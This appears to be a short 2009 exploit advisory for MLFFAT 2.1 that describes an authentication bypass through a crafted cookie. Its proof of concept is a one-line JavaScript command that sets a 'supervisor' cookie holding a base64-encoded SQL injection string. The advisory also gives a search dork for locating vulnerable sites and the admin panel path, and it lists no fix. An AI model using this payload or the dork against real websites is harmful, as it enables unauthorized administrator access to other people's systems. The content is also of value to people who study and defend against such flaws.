Mlffat 2.1 (Auth Bypass - Cookie) SQL Injection Vulnerability

2009-05-13 01:01:26

|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .


######################################################
# MLFFAT 2.1 - insecure Cookie Handling
#
######################################################
# Qabandi | iqa[a]hotmail.fr
From Kuwait, Peace.
Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, all Muslims
######################################################
Buy: http://mlffat.com/emm/index.php?action=order
Dork: "Powered by mlffat"
------------------------------------------------------
-:PoC:-

javascript:document.cookie = "supervisor=OmFkbWluJyBvciAnMSc9JzE6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM="

AdminCP: ./cpanel/index.php


----------> La tsta3mluha 3la al mowaqi3 el islamiya <-------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.